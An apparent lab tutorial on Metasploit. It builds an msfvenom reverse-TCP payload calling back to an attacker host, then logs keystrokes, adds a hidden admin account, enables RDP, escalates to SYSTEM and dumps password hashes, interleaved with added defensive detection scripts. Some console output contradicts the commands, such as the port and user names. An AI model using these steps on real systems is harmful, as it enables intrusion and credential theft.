
Metasploit

Objectives

The key objectives of this chapter are:

  • Understand how a Pen Tester can generate vulnerabilities and test using the Metasploit framework.
  • Define the options and payloads required to generate and use vulnerabilities.
  • Gain remote access.


Related Material

  • Exploiting Android with Metasploit.
  • Exploiting Android with Metasploit (Webview).
  • Exploiting Windows/Mac OS X with Metasploit.
  • Remote Desktop Windows/Mac OS X with Metasploit.
  • Internet of Things Security.
  • Metasploit (Enumeration and Scanning).

Slides

The slides for the chapter are [here]

Tutorial

This article shows how to enable and connect to a remote desktop on a Windows 7 host using Metasploit. The attacker uses a reverse TCP connection so that the compromised host calls back to the attacking host. In this case the attacking host is at 10.200.0.208.

Creating the Vulnerability

The generated executable will create a call-back from the Windows 7 instance to Metasploit. So if the attacking host is at 10.200.0.208 (and the attacked host is at 10.200.0.205), and we call back on port 1234, then we generate the payload with msfvenom. The payload name must match the one the handler is set to later (windows/meterpreter/reverse_tcp), otherwise the handler will send a stage the connecting program cannot use:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.200.0.208 LPORT=1234 -f exe > winexp.exe

Next we copy this executable onto the Windows 7 instance.

Using Metasploit

Once the exploit is on the device, we can use Metasploit to compromise it. To start the Metasploit console from Kali we run:

msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.200.0.208
LHOST => 10.200.0.208
msf exploit(handler) > set LPORT 1234
LPORT => 1234
msf exploit(handler) > exploit

[*] Started reverse handler on 10.200.0.208:4444 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.200.0.205
[*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500
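
The handler output above shows what the call-back looks like from the network side: the workstation (10.200.0.205) opens an outbound TCP connection to the attacker (10.200.0.208) on an unusual port, and the attacker immediately pushes a large first transfer (the 770048-byte stage). The following script, an added example that is not part of the tutorial or of Metasploit, applies those two observations to a handful of constructed flow-log lines. The log format, the client subnet, the sanctioned-port list and the size threshold are all assumptions to be tuned for a real environment.

```python
"""Flag reverse-TCP call-backs in flow logs: an outbound connection from a
workstation to an unsanctioned port, and/or a stage-sized first reply.
Added example; the sample flows are constructed, not captured traffic."""
import ipaddress
import re

WORKSTATIONS = ipaddress.ip_network("10.200.0.0/24")          # assumed client subnet
SANCTIONED_PORTS = {53, 80, 88, 135, 389, 443, 445, 3389}     # assumed allow-list
STAGE_BYTES = 500_000   # a first reply this large looks like a pushed payload stage

# Constructed flow format: <timestamp> <proto> <src>:<sport> -> <dst>:<dport> in=<bytes> out=<bytes>
FLOW_RE = re.compile(
    r"(?P<ts>\S+) (?P<proto>TCP|UDP) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) in=(?P<inb>\d+) out=(?P<outb>\d+)$"
)

# Constructed sample: one web fetch, the Meterpreter call-back from the handler
# output above, a DNS lookup, an SMB session, and a second call-back on port 1234.
SAMPLE_FLOWS = """\
2015-01-01T16:53:58 TCP 10.200.0.205:49260 -> 93.184.216.34:443 in=48210 out=3100
2015-01-01T16:54:07 TCP 10.200.0.205:49265 -> 10.200.0.208:4444 in=770048 out=1842
2015-01-01T16:54:30 UDP 10.200.0.205:51000 -> 10.200.0.1:53 in=120 out=64
2015-01-01T16:55:02 TCP 10.200.0.205:49270 -> 10.200.0.50:445 in=9000 out=8000
2015-01-01T16:56:10 TCP 10.200.0.205:49281 -> 10.200.0.208:1234 in=2048 out=512
"""


def parse_flows(text):
    """Parse flow lines into dicts; lines that do not match the format are skipped."""
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        flows.append({
            "ts": d["ts"], "proto": d["proto"],
            "src": d["src"], "sport": int(d["sport"]),
            "dst": d["dst"], "dport": int(d["dport"]),
            "in": int(d["inb"]), "out": int(d["outb"]),
        })
    return flows


def score_flow(flow):
    """Return the reasons a flow looks like a call-back; an empty list means nothing to flag."""
    reasons = []
    if flow["proto"] != "TCP" or ipaddress.ip_address(flow["src"]) not in WORKSTATIONS:
        return reasons
    if flow["dport"] not in SANCTIONED_PORTS:
        reasons.append(f"outbound to unsanctioned port {flow['dport']}")
    # A reverse shell receives its stage right after connecting: large inbound,
    # almost nothing outbound. Ratio and size are heuristics, not proof.
    if flow["in"] >= STAGE_BYTES and flow["in"] > 50 * flow["out"]:
        reasons.append(f"peer pushed {flow['in']} bytes at once (stage-sized)")
    return reasons


def find_callbacks(text):
    """Return (src, dst, dport, reasons) for every flow with at least one reason."""
    hits = []
    for flow in parse_flows(text):
        reasons = score_flow(flow)
        if reasons:
            hits.append((flow["src"], flow["dst"], flow["dport"], reasons))
    return hits


if __name__ == "__main__":
    for src, dst, dport, reasons in find_callbacks(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{dport}: {'; '.join(reasons)}")
```

Only the two flows to 10.200.0.208 are flagged; the port-4444 flow triggers both rules because it also carries the stage. A port allow-list on its own produces noise on developer machines, so the stage-size rule is what separates the session above from an ordinary download.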

We can capture keystrokes with:

meterpreter > keyscan_start
Starting the keystroke sniffer...

meterpreter > keyscan_dump
Dumping captured keystrokes...
hello

meterpreter > keyscan_stop

Next we run a process on the target:

meterpreter > execute -f calc.exe
Process 3780 created.

meterpreter > screenshot
Screenshot saved to: /root/zJVqTTaq.jpeg

meterpreter > getuid
Server username: Encase-PC1\Encase

meterpreter > sysinfo
Computer        : ENCASE-PC1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_GB
Meterpreter     : x86/win32

meterpreter > getsid
Server SID: S-1-5-21-3026846657-1272420173-2154099446-1000

meterpreter > ifconfig
Interface 13
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:ab:68:00
MTU          : 1500
IPv4 Address : 10.200.0.205
IPv4 Netmask : 255.255.255.0

Next we create a new user (with run getgui -u "user" -p "password") and enable Remote Desktop (with run getgui -e):

meterpreter > run getgui -u newuser -p pass
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] 	Adding User: newuser with Password: pass
[*] 	Hiding user from Windows Login screen
[*] 	Adding User: hacker to local group 'Remote Desktop Users'
[*] 	Adding User: hacker to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4028.rc

meterpreter > run getgui -e

[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4353.rc

10.200.0.205 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(handler) > exit
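
The getgui output above is a compact description of what a defender should look for: a local account is created and, within a second or two, added to 'Remote Desktop Users' and 'Administrators'. The script below, an added example that is not part of the tutorial or of Metasploit, runs that correlation over constructed event records. The records mirror the getgui steps using simplified field names; they stand in for Windows Security events 4720 (user account created) and 4732 (member added to a security-enabled local group), which are the standard IDs for those actions. The ten-minute window is an assumption.

```python
"""Correlate user creation with rapid placement in a sensitive local group,
the sequence getgui performs. Added example; events are constructed and the
field names are a simplified stand-in for the real 4720/4732 event fields."""
from datetime import datetime, timedelta

USER_CREATED = 4720
LOCAL_GROUP_MEMBER_ADDED = 4732
SENSITIVE_GROUPS = {"Administrators", "Remote Desktop Users"}
WINDOW = timedelta(minutes=10)   # assumed: how soon after creation a group add is suspicious

# Constructed events (not real log data). Real 4732 events identify the member by
# SID, so a production version would resolve SIDs to account names first.
SAMPLE_EVENTS = [
    {"time": "2015-01-01 17:02:11", "id": 4720, "subject": "ENCASE-PC1\\Encase",
     "target": "newuser"},
    {"time": "2015-01-01 17:02:11", "id": 4732, "subject": "ENCASE-PC1\\Encase",
     "target": "newuser", "group": "Remote Desktop Users"},
    {"time": "2015-01-01 17:02:12", "id": 4732, "subject": "ENCASE-PC1\\Encase",
     "target": "newuser", "group": "Administrators"},
    # Benign: helpdesk creates an account; rights are granted the next day.
    {"time": "2015-01-01 09:00:00", "id": 4720, "subject": "ENCASE-PC1\\helpdesk",
     "target": "svc_backup"},
    {"time": "2015-01-02 11:30:00", "id": 4732, "subject": "ENCASE-PC1\\helpdesk",
     "target": "svc_backup", "group": "Administrators"},
    # Benign: new user added to a non-sensitive group right away.
    {"time": "2015-01-01 17:05:00", "id": 4732, "subject": "ENCASE-PC1\\Encase",
     "target": "newuser", "group": "Users"},
]


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def detect_fast_privileged_accounts(events, window=WINDOW):
    """Return one alert per sensitive group-add that follows the target's creation within `window`."""
    created_at = {}
    alerts = []
    # Sort by time; sorted() is stable, so same-second events keep log order.
    for ev in sorted(events, key=lambda e: _ts(e["time"])):
        when = _ts(ev["time"])
        if ev["id"] == USER_CREATED:
            created_at[ev["target"].lower()] = when
        elif ev["id"] == LOCAL_GROUP_MEMBER_ADDED and ev.get("group") in SENSITIVE_GROUPS:
            born = created_at.get(ev["target"].lower())
            if born is not None and timedelta(0) <= when - born <= window:
                alerts.append({
                    "user": ev["target"],
                    "group": ev["group"],
                    "by": ev["subject"],
                    "seconds_after_creation": int((when - born).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_fast_privileged_accounts(SAMPLE_EVENTS):
        print(alert)
```

Two alerts come out, both for newuser and both attributed to the Encase account whose session ran the script; the helpdesk account is not flagged because its group change came a day later. Note that the script does not catch the "Hiding user from Windows Login screen" step or the RDP enablement, which are registry changes and need object-access auditing or a periodic configuration audit rather than account-management events.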

We can then connect to the remote desktop with:

root@kali:~# rdesktop -u newuser -p pass 10.200.0.205
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Now let's get the password hash values.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

meterpreter > getuid
Server username: Encase-PC1\Encase

We do not have the privilege to read the password hashes, so we locate a process that runs with a higher privilege and migrate into it:

meterpreter > ps

Process List
============

 PID  PPID Name             Arch    Session  User                          Path
 ---  ---- ----             ----    -------  ----                          ----
 0    0    [System Process]         42949
 4    0    System           x86_64  0
 264  4    smss.exe         x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\smss.exe
 364  524  svchost.exe      x86_64  0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\..\svchost.exe
 372  364  csrss.exe        x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\csrss.exe
 388  524  spoolsv.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\spoolsv.exe
 420  364  wininit.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\wininit.exe
 524  420  services.exe     x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\services.exe
 532  420  lsass.exe        x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\lsass.exe
 540  420  lsm.exe          x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\lsm.exe
 632  524  svchost.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\svchost.exe
 708  524  svchost.exe      x86_64  0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\..\svchost.exe
 788  524  svchost.exe      x86_64  0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\..\svchost.exe
 832  524  svchost.exe      x86_64  0        NT AUTHORITY\SYSTEM           C:\Windows\..\svchost.exe
 856  524  svchost.exe      x86_64  0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\..\svchost.exe

meterpreter > migrate 832
[*] Migrating from 2436 to 832...
[*] Migration completed successfully.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
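
Each hashdump line is in pwdump format, user:RID:LM hash:NT hash:::, and two of the values above are well known: aad3b435b51404eeaad3b435b51404ee is the LM field when no LM hash is stored, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. The following parser, an added example that is not part of the tutorial or of Metasploit, reads such a dump and reports what an administrator should act on: accounts with blank passwords, accounts that still store LM hashes, the built-in Administrator (RID 500) and any accounts that share a password. SAMPLE_HASHDUMP is a constructed copy of the three lines printed above so that the script runs offline.

```python
"""Interpret hashdump (pwdump-format) output from a defender's point of view.
Added example; SAMPLE_HASHDUMP is a constructed copy of the lines shown above."""
from collections import defaultdict
from dataclasses import dataclass

# The LM field holds this value when LM hashing is disabled or the password is
# blank; the NT field holds this value only when the password is the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


@dataclass(frozen=True)
class SamEntry:
    user: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def blank_password(self) -> bool:
        return self.nt_hash == EMPTY_NT

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means the weak, case-insensitive LM form is still kept.
        return self.lm_hash != EMPTY_LM

    @property
    def builtin_admin(self) -> bool:
        # RID 500 is the built-in Administrator even if the account was renamed.
        return self.rid == 500


def parse_hashdump(text: str) -> list[SamEntry]:
    """Parse pwdump-style lines; raises ValueError on a malformed line."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or len(parts[2]) != 32 or len(parts[3]) != 32:
            raise ValueError(f"malformed hashdump line: {line!r}")
        entries.append(SamEntry(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return entries


def audit(entries: list[SamEntry]) -> dict[str, list]:
    """Summarise the findings a defender should act on after seeing such a dump."""
    by_nt = defaultdict(list)
    for e in entries:
        if not e.blank_password:
            by_nt[e.nt_hash].append(e.user)
    return {
        "blank_password": [e.user for e in entries if e.blank_password],
        "lm_stored": [e.user for e in entries if e.lm_stored],
        "builtin_admin": [e.user for e in entries if e.builtin_admin],
        # Accounts sharing one NT hash share one password (reuse across accounts).
        "shared_password": [users for users in by_nt.values() if len(users) > 1],
    }


if __name__ == "__main__":
    for finding, users in audit(parse_hashdump(SAMPLE_HASHDUMP)).items():
        print(f"{finding:16s} {users}")
```

On the dump above, Administrator and Guest have blank passwords and no account stores an LM hash. A blank NT hash on those two accounts is what a default Windows 7 install looks like, where both are disabled; hashdump does not show whether an account is enabled, so each blank-password finding has to be checked against the account's status before it is treated as a live weakness.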